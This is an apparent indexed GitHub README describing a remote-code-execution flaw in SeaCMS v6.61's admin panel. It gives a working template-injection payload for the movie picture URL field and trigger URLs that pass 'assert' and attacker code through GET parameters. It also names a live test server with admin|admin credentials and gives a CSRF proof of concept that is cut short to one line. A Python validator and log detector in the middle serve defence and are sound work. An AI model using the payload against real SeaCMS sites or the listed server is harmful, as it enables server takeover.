Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

https://github.com/imagemlt/seacms

exp

README

# Backend RCE in the latest version of SeaCMS (v6.61)

In SeaCMS's admin platform, on the page for publishing movies, the picture URL field is only weakly filtered, so code injected into it gets executed and we can get a shell. Although there are some checks in `/include/main.class` meant to limit what that code can do, we can find ways to bypass them.
So how is this vulnerability triggered? Here are the steps:
* First, log in to the admin panel; in this case the admin directory has been changed to `/backend`.
![](http://p7lc13qga.bkt.clouddn.com/backend.PNG)
* Second, add a movie and set its picture address to `{if:1)$GLOBALS['_G'.'ET'][a]($GLOBALS['_G'.'ET'][b]);//}{end if}`
![](http://p7lc13qga.bkt.clouddn.com/add.png)
* After adding it, visit `/details/index.php?1.html&m=admin&a=assert&b=phpinfo();` and you will see that `phpinfo()` is executed.
Here `1.html` refers to the id of the video you have just added. In my case the video's id was 2, so I used `2.html`.
![](http://p7lc13qga.bkt.clouddn.com/vul.PNG)
* Or you can just visit `/search.php?searchtype=5&tid=0&a=assert&b=phpinfo();`, or any other page that displays the picture of the video you have just added.
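From the defending side, the two places worth checking are the picture URL field at save time and request logs for the trigger shape above. The following Python is an added example written for this page, not code from the write-up or from SeaCMS; the sample values are constructed for illustration, and the only one taken from the write-up is its picture-address payload, used here as a rejection test:

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlparse

# SeaCMS-style template directives ({if:...}, {end if}) and PHP superglobals have
# no business in a picture URL; the '_G'.'ET' splicing is what the write-up uses
# to dodge a naive keyword filter, so it is flagged as well.
TEMPLATE_DIRECTIVE = re.compile(r"\{\s*(if|end\s*if|loop|php)\b", re.IGNORECASE)
SUPERGLOBAL = re.compile(r"\$(GLOBALS|_GET|_POST|_REQUEST|_COOKIE|_SERVER)", re.IGNORECASE)
STRING_SPLICE = re.compile(r"'\s*\.\s*'")
IMAGE_EXTENSIONS = (".jpg", ".jpeg", ".png", ".gif", ".webp")
# Functions an "a=<name>&b=<argument>" request could hand an argument to.
EXEC_LIKE = {"assert", "eval", "system", "passthru", "shell_exec", "exec", "popen"}


def picture_url_problems(value: str) -> list[str]:
    """Return the reasons a submitted picture URL should be rejected (empty == accept).
    Allow-listing an absolute http(s) URL with an image extension is the real control;
    the pattern checks only explain why a value was refused."""
    decoded = unquote_plus(value)
    problems = []
    if TEMPLATE_DIRECTIVE.search(decoded) or "{" in decoded:
        problems.append("template directive or brace in picture URL")
    if SUPERGLOBAL.search(decoded) or STRING_SPLICE.search(decoded):
        problems.append("PHP superglobal or string splicing in picture URL")
    parsed = urlparse(decoded)
    if parsed.scheme not in ("http", "https") or not parsed.netloc:
        problems.append("not an absolute http(s) URL")
    elif not parsed.path.lower().endswith(IMAGE_EXTENSIONS):
        problems.append("path does not end in an image extension")
    return problems


def suspicious_query(query: str) -> list[str]:
    """Flag a logged query string whose parameter value names a PHP code-execution
    function (the a=assert&b=... shape from the write-up) or carries a directive."""
    findings = []
    if TEMPLATE_DIRECTIVE.search(unquote_plus(query)):
        findings.append("template directive in query string")
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for v in values:
            if v.strip().lower() in EXEC_LIKE:
                findings.append(f"parameter {name!r} names code-execution function {v!r}")
    return findings


if __name__ == "__main__":
    # Constructed samples: a clean poster URL, the write-up's payload, one logged query.
    for sample in ("https://cdn.example.com/posters/2.jpg",
                   "{if:1)$GLOBALS['_G'.'ET'][a]($GLOBALS['_G'.'ET'][b]);//}{end if}"):
        print(sample[:40], "->", picture_url_problems(sample) or "accept")
    print(suspicious_query("1.html&m=admin&a=assert&b=phpinfo();"))
```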

The add-movie page also has no CSRF protection, so we can use CSRF to attack it.
The CSRF PoC is here:
```html
history.pushState('', '', '/')
```

You can test this vulnerability at `http://111.230.11.248:10089/backend/`; the username and password are admin|admin.